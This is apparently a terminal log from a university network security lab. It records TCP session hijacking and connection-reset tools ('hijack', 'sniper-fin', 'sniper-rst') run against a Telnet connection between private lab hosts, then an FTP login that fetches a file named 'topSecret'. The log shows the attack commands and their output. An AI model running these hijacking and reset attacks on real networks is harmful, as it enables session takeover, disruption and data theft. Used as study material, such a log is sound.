[root@localhost tcp_hijack]# hijack 192.168.1.103 1073 192.168.1.101 ----------------------------------------------- Takeover phase 1: Stealing connection. Sending Spoofed clean-up data... Waiting for spoof to be confirmed... Phase 1 ended. Takeover phase 2: Getting on track with SEQ/ACK's again Server SEQ: 286A59B4 (hex) ACK: 40F9241A (hex) Phase 2 ended. Takeover phase 3: Sending MY data. Sending evil data. Waiting for evil data to be confirmed... Phase 3 unsuccesfully ended. [root@localhost tcp_hijack]# sniper-fin 192.168.1.103 1074 192.168.1.101 23 Attack Sequence 1. Connection 10 secs idle... timeout. [root@localhost tcp_hijack]# sniper-fin 192.168.1.103 1074 192.168.1.101 23 Attack Sequence 1. Killed the connection... [root@localhost tcp_hijack]# sniper-rst 192.168.1.103 1075 192.168.1.101 23 Trying to terminate the connection Connection 5 secs idle or dead... [root@localhost tcp_hijack]# hijack 192.168.1.103 1073 192.168.1.101 ----------------------------------------------- Takeover phase 1: Stealing connection. Sending Spoofed clean-up data... Waiting for spoof to be confirmed... Phase 1 ended. Takeover phase 2: Getting on track with SEQ/ACK's again Server SEQ: 286A59B4 (hex) ACK: 40F9241A (hex) Phase 2 ended. Takeover phase 3: Sending MY data. Sending evil data. Waiting for evil data to be confirmed... Phase 3 ended. [ranveer@localhost cs519]$ ftp 192.168.1.101 Connected to 192.168.1.101. 220 heineken FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready. 530 Please login with USER and PASS. 530 Please login with USER and PASS. KERBEROS_V4 rejected as an authentication type Name (192.168.1.101:ranveer): clueless 331 Password required for clueless. Password: 230 User clueless logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> get topSecret local: topSecret remote: topSecret 227 Entering Passive Mode (192,168,1,101,126,50) 150 Opening BINARY mode data connection for topSecret (61 bytes). 226 Transfer complete. 61 bytes received in 0.00012 seconds (4.9e+02 Kbytes/s) ftp> by 221-You have transferred 61 bytes in 1 files. 221-Total traffic for this session was 596 bytes in 1 transfers. 221-Thank you for using the FTP service on heineken. 221 Goodbye.